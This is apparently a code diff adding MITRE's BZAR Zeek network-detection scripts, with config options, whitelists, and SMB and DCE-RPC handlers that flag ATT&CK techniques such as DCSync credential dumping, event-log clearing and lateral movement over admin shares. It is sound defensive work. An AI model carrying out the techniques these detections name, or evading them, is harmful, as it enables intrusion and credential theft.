+	# ATTACK::Lateral_Movement_and_Execution
+	# Aggregate SumStats Indicator
+	# Option to control whether or not to write this SumStats indicator to the Notice Log.
+
+	option attack_lm_ex_report_option = T;
+
+	# ATTACK::Lateral_Movement_Extracted_File
+	# Options to control whether or not to extract files associated with Lateral Movement
+	# and whether or not to write to Notice Log. If _extract is False, _report has no effect.
+	option attack_lm_file_extract_option = T;		
+	option attack_lm_extracted_file_report_option = T;	
+
+	# ATTACK::Persistence
+	option t1547_004_detect_option = T;
+	option t1547_004_report_option = T;
+
+	option t1547_010_detect_option = T;
+	option t1547_010_report_option = T;
+
+	# ATTACK::Discovery
+	option t1016_detect_option = T;
+	option t1018_detect_option = T;
+	option t1033_detect_option = T;
+	option t1049_detect_option = T;
+	option t1069_detect_option = T;
+	option t1082_detect_option = T;
+	option t1083_detect_option = T;
+	option t1087_detect_option = T;
+	option t1124_detect_option = T;
+	option t1135_detect_option = T;
+
+	# Recommendation: Do not report these Discovery indicators individually.
+	option t1016_report_option = F;
+	option t1018_report_option = F;
+	option t1033_report_option = F;
+	option t1049_report_option = F;
+	option t1069_report_option = F;
+	option t1082_report_option = F;
+	option t1083_report_option = F;
+	option t1087_report_option = F;
+	option t1124_report_option = F;
+	option t1135_report_option = F;
+
+	# Aggregate SumStats Reporting of Discovery Indicators
+	# Dependent on individual Discovery indicators above.
+
+	option attack_discovery_report_option = T; 
+
+
+	#
+	# BZAR Whitelist - Ignore ATT&CK Indicators Involving these Endpoints
+	#
+	# Description:
+	#	Whitelists can be specified by IP address, IP subnet, or host
+	#	name for each ATT&CK indicator.  Furthermore, the whitelists can
+	#	be specified by originating address, subnet, or hostname; and by
+	#	responding address, subnet, or hostname.
+	#
+	# xxxx_whitelist_orig_addrs : set[addr]
+	#	Add originating IP addresses to ignore for an ATT&CK indicator.
+	#	The value of 'c$id$orig_h' is checked against this list before 
+	#	writing to Notice Log and/or SumStats Observation.
+	#
+	# xxxx_whitelist_resp_addrs : set[addr]
+	#	Add responding IP addresses to ignore for an ATT&CK indicator.
+	#	The value of 'c$id$resp_h' is checked against this list before 
+	#	writing to Notice Log and/or SumStats Observation.
+	#
+	# xxxx_whitelist_orig_subnets : set[subnet]
+	#	Add originating IP subnets to ignore for an ATT&CK indicator.
+	#	The value of 'c$id$orig_h' is checked against this list before 
+	#	writing to Notice Log and/or SumStats Observation.
+	#
+	# xxxx_whitelist_resp_subnets : set[subnet]
+	#	Add responding IP subnets to ignore for an ATT&CK indicator.
+	#	The value of 'c$id$resp_h' is checked against this list before 
+	#	writing to Notice Log and/or SumStats Observation.
+	#
+	# xxxx_whitelist_orig_names : set[string]
+	#	Add originating IP addresses to ignore for an ATT&CK indicator.
+	#	CAUTION: A DNS reverse-lookup of the value of 'c$id$orig_h' is
+	#	performed and the result is checked against this list before
+	#	writing to Notice Log and/or SumStats Observation.  The DNS
+	#	reverse-lookup could adversely affect system performance.
+	#
+	# xxxx_whitelist_resp_names : set[string]
+	#	Add responding IP addresses to ignore for an ATT&CK indicator.
+	#	CAUTION: A DNS reverse-lookup of the value of 'c$id$resp_h' is
+	#	performed and the result is checked against this list before
+	#	writing to Notice Log and/or SumStats Observation.  The DNS
+	#	reverse-lookup could adversely affect system performance.
+	#
+
+	option whitelist_dns_timeout = 1sec;
+
+	# ATTACK::Credential_Access
+
+	# ATTACK::Credential_Access
+	option t1003_006_whitelist_orig_addrs   : set[addr] = {};
+	option t1003_006_whitelist_resp_addrs   : set[addr] = {};
+	option t1003_006_whitelist_orig_subnets : set[subnet] = {};
+	option t1003_006_whitelist_resp_subnets : set[subnet] = {};
+	option t1003_006_whitelist_orig_names   : set[string] = {};
+	option t1003_006_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Defense_Evasion
+	option t1070_001_whitelist_orig_addrs   : set[addr] = {};
+	option t1070_001_whitelist_resp_addrs   : set[addr] = {};
+	option t1070_001_whitelist_orig_subnets : set[subnet] = {};
+	option t1070_001_whitelist_resp_subnets : set[subnet] = {};
+	option t1070_001_whitelist_orig_names   : set[string] = {};
+	option t1070_001_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Execution
+	option t1569_002_whitelist_orig_addrs   : set[addr] = {};
+	option t1569_002_whitelist_resp_addrs   : set[addr] = {};
+	option t1569_002_whitelist_orig_subnets : set[subnet] = {};
+	option t1569_002_whitelist_resp_subnets : set[subnet] = {};
+	option t1569_002_whitelist_orig_names   : set[string] = {};
+	option t1569_002_whitelist_resp_names   : set[string] = {};
+
+	option t1047_whitelist_orig_addrs   : set[addr] = {};
+	option t1047_whitelist_resp_addrs   : set[addr] = {};
+	option t1047_whitelist_orig_subnets : set[subnet] = {};
+	option t1047_whitelist_resp_subnets : set[subnet] = {};
+	option t1047_whitelist_orig_names   : set[string] = {};
+	option t1047_whitelist_resp_names   : set[string] = {};
+
+	option t1053_002_whitelist_orig_addrs   : set[addr] = {};
+	option t1053_002_whitelist_resp_addrs   : set[addr] = {};
+	option t1053_002_whitelist_orig_subnets : set[subnet] = {};
+	option t1053_002_whitelist_resp_subnets : set[subnet] = {};
+	option t1053_002_whitelist_orig_names   : set[string] = {};
+	option t1053_002_whitelist_resp_names   : set[string] = {};
+
+	option t1053_005_whitelist_orig_addrs   : set[addr] = {};
+	option t1053_005_whitelist_resp_addrs   : set[addr] = {};
+	option t1053_005_whitelist_orig_subnets : set[subnet] = {};
+	option t1053_005_whitelist_resp_subnets : set[subnet] = {};
+	option t1053_005_whitelist_orig_names   : set[string] = {};
+	option t1053_005_whitelist_resp_names   : set[string] = {};
+
+	# ATTCK::Impact
+	option t1529_whitelist_orig_addrs   : set[addr] = {};
+	option t1529_whitelist_resp_addrs   : set[addr] = {};
+	option t1529_whitelist_orig_subnets : set[subnet] = {};
+	option t1529_whitelist_resp_subnets : set[subnet] = {};
+	option t1529_whitelist_orig_names   : set[string] = {};
+	option t1529_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Lateral_Movement
+	option t1021_002_t1570_whitelist_orig_addrs   : set[addr] = {};
+	option t1021_002_t1570_whitelist_resp_addrs   : set[addr] = {};
+	option t1021_002_t1570_whitelist_orig_subnets : set[subnet] = {};
+	option t1021_002_t1570_whitelist_resp_subnets : set[subnet] = {};
+	option t1021_002_t1570_whitelist_orig_names   : set[string] = {};
+	option t1021_002_t1570_whitelist_resp_names   : set[string] = {};
+
+	option t1021_002_whitelist_orig_addrs   : set[addr] = {};
+	option t1021_002_whitelist_resp_addrs   : set[addr] = {};
+	option t1021_002_whitelist_orig_subnets : set[subnet] = {};
+	option t1021_002_whitelist_resp_subnets : set[subnet] = {};
+	option t1021_002_whitelist_orig_names   : set[string] = {};
+	option t1021_002_whitelist_resp_names   : set[string] = {};
+
+	option t1570_whitelist_orig_addrs   : set[addr] = {};
+	option t1570_whitelist_resp_addrs   : set[addr] = {};
+	option t1570_whitelist_orig_subnets : set[subnet] = {};
+	option t1570_whitelist_resp_subnets : set[subnet] = {};
+	option t1570_whitelist_orig_names   : set[string] = {};
+	option t1570_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Lateral_Movement_Multiple_Attempts
+	option t1021_002_multiple_attempts_whitelist_orig_addrs   : set[addr] = {};
+	option t1021_002_multiple_attempts_whitelist_resp_addrs   : set[addr] = {};
+	option t1021_002_multiple_attempts_whitelist_orig_subnets : set[subnet] = {};
+	option t1021_002_multiple_attempts_whitelist_resp_subnets : set[subnet] = {};
+	option t1021_002_multiple_attempts_whitelist_orig_names   : set[string] = {};
+	option t1021_002_multiple_attempts_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Lateral_Movement_and_Execution
+	option attack_lm_ex_whitelist_orig_addrs   : set[addr] = {};
+	option attack_lm_ex_whitelist_resp_addrs   : set[addr] = {};
+	option attack_lm_ex_whitelist_orig_subnets : set[subnet] = {};
+	option attack_lm_ex_whitelist_resp_subnets : set[subnet] = {};
+	option attack_lm_ex_whitelist_orig_names   : set[string] = {};
+	option attack_lm_ex_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Lateral_Movement_Extracted_File
+	option attack_lm_extracted_file_whitelist_orig_addrs   : set[addr] = {};
+	option attack_lm_extracted_file_whitelist_resp_addrs   : set[addr] = {};
+	option attack_lm_extracted_file_whitelist_orig_subnets : set[subnet] = {};
+	option attack_lm_extracted_file_whitelist_resp_subnets : set[subnet] = {};
+	option attack_lm_extracted_file_whitelist_orig_names   : set[string] = {};
+	option attack_lm_extracted_file_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Persistence
+	option t1547_004_whitelist_orig_addrs   : set[addr] = {};
+	option t1547_004_whitelist_resp_addrs   : set[addr] = {};
+	option t1547_004_whitelist_orig_subnets : set[subnet] = {};
+	option t1547_004_whitelist_resp_subnets : set[subnet] = {};
+	option t1547_004_whitelist_orig_names   : set[string] = {};
+	option t1547_004_whitelist_resp_names   : set[string] = {};
+
+	option t1547_010_whitelist_orig_addrs   : set[addr] = {};
+	option t1547_010_whitelist_resp_addrs   : set[addr] = {};
+	option t1547_010_whitelist_orig_subnets : set[subnet] = {};
+	option t1547_010_whitelist_resp_subnets : set[subnet] = {};
+	option t1547_010_whitelist_orig_names   : set[string] = {};
+	option t1547_010_whitelist_resp_names   : set[string] = {};
+
+	# ATTACK::Discovery
+	option attack_discovery_whitelist_orig_addrs   : set[addr] = {};
+	option attack_discovery_whitelist_resp_addrs   : set[addr] = {};
+	option attack_discovery_whitelist_orig_subnets : set[subnet] = {};
+	option attack_discovery_whitelist_resp_subnets : set[subnet] = {};
+	option attack_discovery_whitelist_orig_names   : set[string] = {};
+	option attack_discovery_whitelist_resp_names   : set[string] = {};
+
+	# If needed, use whitelists for the individual Discovery indicators
+	option t1016_whitelist_orig_addrs   : set[addr] = {};
+	option t1016_whitelist_resp_addrs   : set[addr] = {};
+	option t1016_whitelist_orig_subnets : set[subnet] = {};
+	option t1016_whitelist_resp_subnets : set[subnet] = {};
+	option t1016_whitelist_orig_names   : set[string] = {};
+	option t1016_whitelist_resp_names   : set[string] = {};
+
+	option t1018_whitelist_orig_addrs   : set[addr] = {};
+	option t1018_whitelist_resp_addrs   : set[addr] = {};
+	option t1018_whitelist_orig_subnets : set[subnet] = {};
+	option t1018_whitelist_resp_subnets : set[subnet] = {};
+	option t1018_whitelist_orig_names   : set[string] = {};
+	option t1018_whitelist_resp_names   : set[string] = {};
+
+	option t1033_whitelist_orig_addrs   : set[addr] = {};
+	option t1033_whitelist_resp_addrs   : set[addr] = {};
+	option t1033_whitelist_orig_subnets : set[subnet] = {};
+	option t1033_whitelist_resp_subnets : set[subnet] = {};
+	option t1033_whitelist_orig_names   : set[string] = {};
+	option t1033_whitelist_resp_names   : set[string] = {};
+
+	option t1049_whitelist_orig_addrs   : set[addr] = {};
+	option t1049_whitelist_resp_addrs   : set[addr] = {};
+	option t1049_whitelist_orig_subnets : set[subnet] = {};
+	option t1049_whitelist_resp_subnets : set[subnet] = {};
+	option t1049_whitelist_orig_names   : set[string] = {};
+	option t1049_whitelist_resp_names   : set[string] = {};
+
+	option t1069_whitelist_orig_addrs   : set[addr] = {};
+	option t1069_whitelist_resp_addrs   : set[addr] = {};
+	option t1069_whitelist_orig_subnets : set[subnet] = {};
+	option t1069_whitelist_resp_subnets : set[subnet] = {};
+	option t1069_whitelist_orig_names   : set[string] = {};
+	option t1069_whitelist_resp_names   : set[string] = {};
+
+	option t1082_whitelist_orig_addrs   : set[addr] = {};
+	option t1082_whitelist_resp_addrs   : set[addr] = {};
+	option t1082_whitelist_orig_subnets : set[subnet] = {};
+	option t1082_whitelist_resp_subnets : set[subnet] = {};
+	option t1082_whitelist_orig_names   : set[string] = {};
+	option t1082_whitelist_resp_names   : set[string] = {};
+
+	option t1083_whitelist_orig_addrs   : set[addr] = {};
+	option t1083_whitelist_resp_addrs   : set[addr] = {};
+	option t1083_whitelist_orig_subnets : set[subnet] = {};
+	option t1083_whitelist_resp_subnets : set[subnet] = {};
+	option t1083_whitelist_orig_names   : set[string] = {};
+	option t1083_whitelist_resp_names   : set[string] = {};
+
+	option t1087_whitelist_orig_addrs   : set[addr] = {};
+	option t1087_whitelist_resp_addrs   : set[addr] = {};
+	option t1087_whitelist_orig_subnets : set[subnet] = {};
+	option t1087_whitelist_resp_subnets : set[subnet] = {};
+	option t1087_whitelist_orig_names   : set[string] = {};
+	option t1087_whitelist_resp_names   : set[string] = {};
+
+	option t1124_whitelist_orig_addrs   : set[addr] = {};
+	option t1124_whitelist_resp_addrs   : set[addr] = {};
+	option t1124_whitelist_orig_subnets : set[subnet] = {};
+	option t1124_whitelist_resp_subnets : set[subnet] = {};
+	option t1124_whitelist_orig_names   : set[string] = {};
+	option t1124_whitelist_resp_names   : set[string] = {};
+
+	option t1135_whitelist_orig_addrs   : set[addr] = {};
+	option t1135_whitelist_resp_addrs   : set[addr] = {};
+	option t1135_whitelist_orig_subnets : set[subnet] = {};
+	option t1135_whitelist_resp_subnets : set[subnet] = {};
+	option t1135_whitelist_orig_names   : set[string] = {};
+	option t1135_whitelist_resp_names   : set[string] = {};
+
+
+	#
+	# BZAR Analytics - Use SumStats to Correlate ATT&CK Indicators
+	#
+
+	# 1- SumStats Analytics for ATTACK::Lateral_Movement_and_Execution
+
+	option bzar1_epoch = 10min;
+	option bzar1_limit = 1001.0; # SMB_WRITE == 1; RPC_EXEC == 1000;
+
+	# 2- SumStats Analytics for ATTACK::Lateral_Movement_Multiple_Attempts
+	#    Use threshold vector for greater fidelity and to assist in tuning
+	#    the threshold for each unique environment.
+
+	option bzar2_epoch = 5min;
+	option bzar2_limit = vector(5.0, 10.0, 15.0, 20.0, 30.0, 40.0, 50.0, 100.0);
+
+	# 3- SumStats Analytics for ATTACK::Discovery
+	#    Use threshold vector for greater fidelity and to assist in tuning
+	#    the threshold for each unique environment.
+
+	option bzar3_epoch = 5min;
+	option bzar3_limit = vector(5.0, 10.0, 15.0, 20.0, 30.0, 40.0, 50.0, 100.0);
+}
+#end export
+
+#end bzar_config_options.zeek
--- a/capitalone/external/mitre_bzar/bzar_dce-rpc_consts.zeek
+++ b/capitalone/external/mitre_bzar/bzar_dce-rpc_consts.zeek
--- a/capitalone/external/mitre_bzar/bzar_dce-rpc_detect.zeek
+++ b/capitalone/external/mitre_bzar/bzar_dce-rpc_detect.zeek
@ -0,0 +1,222 @@
+#
+# File: bzar_dce-rpc_detect.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+#
+# DCE-RPC Event Handlers
+#
+
+@if ((Version::info$major == 2) && (Version::info$minor <= 5))
+
+# Use this syntax for Bro v2.5.x and below
+event dce_rpc_response(c: connection, fid: count, opnum: count, stub_len: count) &priority=3
+{
+
+@else
+
+# Use this syntax for Bro v2.6.x and above
+event dce_rpc_response(c: connection, fid: count, ctx_id: count, opnum: count, stub_len: count) &priority=3
+{
+
+@endif
+	# priority==3 ... We want to execute before writing to dce_rpc.log
+	# because default Bro script deletes 'c$dce_rpc' after writing to log
+
+	local rpc = "";
+
+	#
+	# Get UUID and OpNum, by Name (endpoint::operation)
+	#
+
+	if ( c?$dce_rpc && c$dce_rpc?$endpoint && c$dce_rpc?$operation )
+	{
+		rpc = fmt("%s::%s", c$dce_rpc$endpoint, c$dce_rpc$operation);
+	}
+	else
+	{
+		return;
+	}
+
+
+	# Check DCE-RPC endpoint::operation
+
+	#
+	# ATTACK::Credential_Access
+	#
+	if ( rpc in t1003_006_rpc_strings && t1003_006_detect_option )
+	{
+		# Looks like:
+		# T1003.006 OS Credential Dumping: DCSync
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1003_006_log(c, rpc);
+	}
+	#
+	# ATTACK::Defense_Evasion
+	#
+	else if ( rpc in t1070_001_rpc_strings && t1070_001_detect_option )
+	{
+		# Looks like:
+		# T1070.001 Indicator Removal on Host: Clear Windows Event Logs
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1070_001_log(c, rpc);
+	}
+	#
+	# ATTACK::Execution
+	#
+	else if ( rpc in t1569_002_rpc_strings && t1569_002_detect_option )
+	{
+		# Looks like:
+		# T1569.002 System Services: Service Execution
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1569_002_log(c, rpc);
+	}
+	else if ( rpc in t1047_rpc_strings && t1047_detect_option )
+	{
+		# Looks like:
+		# T1047 WMI
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1047_log(c, rpc);
+	}
+	else if ( rpc in t1053_002_rpc_strings && t1053_002_detect_option )
+	{
+		# Looks like:
+		# T1053.002 Scheduled Task/Job: At
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1053_002_log(c, rpc);
+	}
+	else if ( rpc in t1053_005_rpc_strings && t1053_005_detect_option )
+	{
+		# Looks like:
+		# T1053.005 Scheduled Task/Job: Scheduled Task
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1053_005_log(c, rpc);
+	}
+	#
+	# ATTACK::Impact
+	#
+	else if ( rpc in t1529_rpc_strings && t1529_detect_option )
+	{
+		# Looks like:
+		# T1529 System Shutdown/Reboot
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1529_log(c, rpc);
+	}
+	#
+	# ATTACK::Persistence
+	#
+	else if ( rpc in t1547_004_rpc_strings && t1547_004_detect_option )
+	{
+		# Looks like:
+		# T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1547_004_log(c, rpc);
+	}
+	else if ( rpc in t1547_010_rpc_strings && t1547_010_detect_option )
+	{
+		# Looks like:
+		# T1547.010 Boot or Logon Autostart Execution: Port Monitors
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1547_010_log(c, rpc);
+	}
+	#
+	# ATTACK::Discovery
+	#
+	else if ( rpc in t1016_rpc_strings && t1016_detect_option )
+	{
+		# Looks like:
+		# T1016 System Network Configuration Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1016_log(c, rpc);
+	}
+	else if ( rpc in t1018_rpc_strings && t1018_detect_option )
+	{
+		# Looks like:
+		# T1018 Remote System Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1018_log(c, rpc);
+	}
+	else if ( rpc in t1033_rpc_strings && t1033_detect_option )
+	{
+		# Looks like:
+		# T1033 System Owner/User Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1033_log(c, rpc);
+	}
+	else if ( rpc in t1049_rpc_strings && t1049_detect_option )
+	{
+		# Looks like:
+		# T1049 System Network Connections Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1049_log(c, rpc);
+	}
+	else if ( rpc in t1069_rpc_strings && t1069_detect_option )
+	{
+		# Looks like:
+		# T1069 Permission Groups Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1069_log(c, rpc);
+	}
+	else if ( rpc in t1082_rpc_strings && t1082_detect_option )
+	{
+		# Looks like:
+		# T1082 System Information Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1082_log(c, rpc);
+	}
+	else if ( rpc in t1083_rpc_strings && t1083_detect_option )
+	{
+		# Looks like:
+		# T1083 File and Directory Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1083_log(c, rpc);
+	}
+	else if ( rpc in t1087_rpc_strings && t1087_detect_option )
+	{
+		# Looks like:
+		# T1087 Account Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1087_log(c, rpc);
+	}
+	else if ( rpc in t1124_rpc_strings && t1124_detect_option )
+	{
+		# Looks like:
+		# T1124 System Time Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1124_log(c, rpc);
+	}
+	else if ( rpc in t1135_rpc_strings && t1135_detect_option )
+	{
+		# Looks like:
+		# T1135 Network Share Discovery
+
+		# Raise Notice and/or Set Observation
+		BZAR::rpc_t1135_log(c, rpc);
+	}
+}
+
+#end bzar_dce-rpc_detect.zeek
--- a/capitalone/external/mitre_bzar/bzar_dce-rpc_report.zeek
+++ b/capitalone/external/mitre_bzar/bzar_dce-rpc_report.zeek
--- a/capitalone/external/mitre_bzar/bzar_files.zeek
+++ b/capitalone/external/mitre_bzar/bzar_files.zeek
@ -0,0 +1,97 @@
+#
+# File: bzar_files.zeek
+# Created: 20180701
+# Updated: 20200228
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+function file_extract_whitelist_test ( c : connection ) : bool
+{
+	# Get whitelist from config options
+	local w1 : BZAR::EndpointWhitelist;
+
+	w1$orig_addrs   = attack_lm_extracted_file_whitelist_orig_addrs;
+	w1$resp_addrs   = attack_lm_extracted_file_whitelist_resp_addrs;
+
+	w1$orig_subnets = attack_lm_extracted_file_whitelist_orig_subnets;
+	w1$resp_subnets = attack_lm_extracted_file_whitelist_resp_subnets;
+
+	w1$orig_names   = attack_lm_extracted_file_whitelist_orig_names;
+	w1$resp_names   = attack_lm_extracted_file_whitelist_resp_names;
+
+	# Check whitelist
+	return BZAR::whitelist_test(c$id$orig_h, c$id$resp_h, w1);
+}
+
+
+event file_over_new_connection(f:fa_file, c:connection, is_orig:bool)
+{
+	# Check Option
+	if ( !attack_lm_file_extract_option ) { return; }
+
+	# Check if SMB Tree Path is an Admin File Share
+	if ( f?$source && f$source == "SMB" && c?$smb_state &&
+	     BZAR::smb_admin_file_share_test(c$smb_state)
+	   )
+	{
+		# Check if SMB Write to an Admin File Share
+		if ( c$smb_state?$current_file &&
+		     c$smb_state$current_file?$action &&
+		     c$smb_state$current_file$action == SMB::FILE_WRITE )
+		{
+	 		# Check whitelist
+			if ( !BZAR::file_extract_whitelist_test(c) )
+			{
+				local smb_name = BZAR::smb_full_path_and_file_name(c$smb_state);
+				local fname = fmt("%s_%s%s", c$uid, f$id, subst_string(smb_name, "\\", "_"));
+
+				Files::add_analyzer(f, Files::ANALYZER_EXTRACT, Files::AnalyzerArgs($extract_filename=fname));
+				Files::add_analyzer(f, Files::ANALYZER_MD5);
+				Files::add_analyzer(f, Files::ANALYZER_SHA1);
+				Files::add_analyzer(f, Files::ANALYZER_SHA256);
+			}
+		}
+	}
+}
+
+
+event file_state_remove(f:fa_file)
+{
+	# Check Options
+	if ( !attack_lm_file_extract_option ) { return; }
+	else if ( !attack_lm_extracted_file_report_option ) { return; }
+
+	local fname = "";
+
+	if ( f?$source && f$source == "SMB" && f?$conns && f$info?$extracted )
+	{
+		fname = f$info$extracted;
+
+		for ( x in f$conns )
+		{
+			local c = f$conns[x];
+
+			# Check if SMB Tree Path is an Admin File Share
+			if ( c?$smb_state && BZAR::smb_admin_file_share_test(c$smb_state) )
+			{
+		 		# Check whitelist
+				if ( !BZAR::file_extract_whitelist_test(c) )
+				{
+					# Raise Notice
+					NOTICE([$note=ATTACK::Lateral_Movement_Extracted_File,
+						$msg="Saved a copy of the file written to SMB admin file share",
+						$sub=fname,
+						$f=f,
+						$conn=c]
+					);
+				}
+			}
+		}
+	}
+}
+
+#end bzar_files.zeek
--- a/capitalone/external/mitre_bzar/bzar_smb1_detect.zeek
+++ b/capitalone/external/mitre_bzar/bzar_smb1_detect.zeek
@ -0,0 +1,105 @@
+#
+# File: bzar_smb1_detect.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+#
+# SMB1 Event Handlers
+#
+
+event smb1_tree_connect_andx_request(c: connection, hdr: SMB1::Header, path: string, svc: string) &priority=3
+{
+	local smb_action = "SMB::TREE_CONNECT to";
+
+	# Check if detect_option is True &&
+	# Check if SMB Tree Path is an Admin File Share
+
+	if ( BZAR::t1021_002_detect_option &&
+	     BZAR::smb_admin_file_share_test(c$smb_state) )
+	{
+		# Looks like:
+		# T1021.002 Remote Services: SMB/Windows Admin Shares (File Shares Only)
+
+		# Raise Notice and/or Set Observation
+		BZAR::smb_t1021_002_log(c, smb_action);
+	}
+}
+
+
+event smb1_nt_create_andx_request(c: connection, hdr: SMB1::Header, name: string) &priority=3
+{
+	# Copied this snippet from Bro default handler:
+	# policy/protocols/smb/smb1-main.bro#smb1_write_andx_request.
+	# It is important to know the full file path at SMB::FILE_OPEN time,
+	# so the smb_files.log is consistent with smb_cmd.log.
+	# Let's do this now, during smb1_nt_create_andx_request.
+
+	if ( c$smb_state$current_tree?$path && !c$smb_state$current_file?$path ) 
+		c$smb_state$current_file$path = c$smb_state$current_tree$path; 
+}
+
+
+event smb1_write_andx_request(c: connection, hdr: SMB1::Header, file_id: count, offset: count, data_len: count) &priority=3
+{ 
+	# Keep track of the number of bytes in the Write Request.
+	# priority==3 ... We want to execute before writing to smb_files.log
+
+	c$smb_state$current_file$data_offset_req = offset;
+	c$smb_state$current_file$data_len_req    = data_len;
+}
+
+
+event smb1_write_andx_response(c: connection, hdr: SMB1::Header, written_bytes: count) &priority=3
+{
+	local smb_action = "SMB::FILE_WRITE to";
+
+	# Copied this snippet from Bro default handler:
+	# policy/protocols/smb/smb1-main.bro#smb1_write_andx_request.
+	# Can't hurt to double-check this.
+
+	# Skip if the request was not seen and we don't know what the current file is
+	if ( !c?$smb_state || !c$smb_state?$current_file )
+		return;
+
+	if ( c$smb_state$current_tree?$path && !c$smb_state$current_file?$path ) 
+		c$smb_state$current_file$path = c$smb_state$current_tree$path; 
+
+	# Keep track of the number of bytes in the Write Response. 
+	# priority==3 ... We want to execute before writing to smb_files.log
+
+	c$smb_state$current_file$data_len_rsp = written_bytes;
+
+
+	# Check if detect_option is True &&
+	# Check if SMB Tree Path is an Admin File Share
+
+	if ( BZAR::t1021_002_t1570_detect_option &&
+	     BZAR::smb_admin_file_share_test(c$smb_state) )
+	{
+		# Looks like:
+		# T1570 Lateral Tool Transfer &&
+		# T1021.002 Remote Services: SMB/Windows Admin Shares (File Shares Only)
+
+		# Raise Notice and/or Set Observation
+		BZAR::smb_t1021_002_t1570_log(c, smb_action);
+	}
+}
+
+
+event smb1_write_andx_response(c: connection, hdr: SMB1::Header, written_bytes: count) &priority=-5
+{
+	# Write to smb_files.log, but only if we did see the request.
+	# See detection logic above.
+	if ( !c?$smb_state || !c$smb_state?$current_file )
+		return;
+
+	SMB::write_file_log(c$smb_state);
+}
+
+#end bzar_smb1_detect.zeek
--- a/capitalone/external/mitre_bzar/bzar_smb2_detect.zeek
+++ b/capitalone/external/mitre_bzar/bzar_smb2_detect.zeek
@ -0,0 +1,133 @@
+#
+# File: bzar_smb2_detect.zeek
+# Created: 20180701
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+#
+# SMB2 Event Handlers
+#
+
+event smb2_message(c: connection, hdr: SMB2::Header, is_orig: bool) &priority=3
+{
+	# Copied this snippet from Bro default handler:
+	# policy/protocols/smb/smb1-main.bro#smb1_message.
+	# The smb_cmd.log was inconsistent with the .$tree field
+	# for SMB1 (populated) and SMB2 (was not populated).
+
+	if ( c$smb_state$current_tree?$path )
+	     c$smb_state$current_cmd$tree = c$smb_state$current_tree$path; 
+}
+
+
+event smb2_tree_connect_request(c: connection, hdr: SMB2::Header, path: string) &priority=3
+{
+	local smb_action = "SMB::TREE_CONNECT to";
+
+	# Copied this snippet from Bro default handler:
+	# policy/protocols/smb/smb1-main.bro#smb1_tree_connect_andx_request.
+	# The smb_cmd.log was inconsistent with certain fields
+	# for SMB1 (populated) and SMB2 (was not populated).
+
+	local tmp_tree = SMB::TreeInfo($ts=network_time(), $uid=c$uid, $id=c$id, $path=path); 
+
+	c$smb_state$current_cmd$referenced_tree = tmp_tree; 
+	c$smb_state$current_cmd$argument = path;
+
+
+	# Check if detect_option is True &&
+	# Check if SMB Tree Path is an Admin File Share
+
+	if ( BZAR::t1021_002_detect_option &&
+	     BZAR::smb_admin_file_share_test(c$smb_state) )
+	{
+		# Looks like:
+		# T1021.002 Remote Services: SMB/Windows Admin Shares (File Shares Only)
+
+		# Raise Notice and/or Set Observation
+		BZAR::smb_t1021_002_log(c, smb_action);
+	}
+}
+
+
+@if ((Version::info$major == 2) && (Version::info$minor <= 5))
+
+# Use this syntax for Bro v2.5.x and below
+event smb2_create_request(c: connection, hdr: SMB2::Header, name: string) &priority=3
+{
+
+@else
+
+# Use this syntax for Bro v2.6.x and above
+event smb2_create_request(c: connection, hdr: SMB2::Header, request: SMB2::CreateRequest) &priority=3
+{
+
+@endif
+	# Copied this snippet from Bro default handler:
+	# policy/protocols/smb/smb1-main.bro#smb1_write_andx_request.
+	# It is important to know the full file path at SMB::FILE_OPEN time,
+	# so the smb_files.log is consistent with smb_cmd.log.
+	# Let's do this now, during smb2_create_request.
+
+	if ( c$smb_state$current_tree?$path && !c$smb_state$current_file?$path ) 
+	     c$smb_state$current_file$path = c$smb_state$current_tree$path; 
+}
+
+
+event smb2_write_request(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, offset: count, data_len: count) &priority=3 
+{ 
+	# Keep track of the number of bytes in the Write Response. 
+	# priority==3 ... We want to execute before writing to smb_files.log
+
+	c$smb_state$current_file$data_offset_req = offset;
+	c$smb_state$current_file$data_len_req    = data_len;
+} 
+
+
+event smb2_write_request(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, offset: count, data_len: count) &priority=2 
+{
+	# NOTE: Preference would be to detect 'smb2_write_response' 
+	#       event (instead of 'smb2_write_request'), because it 
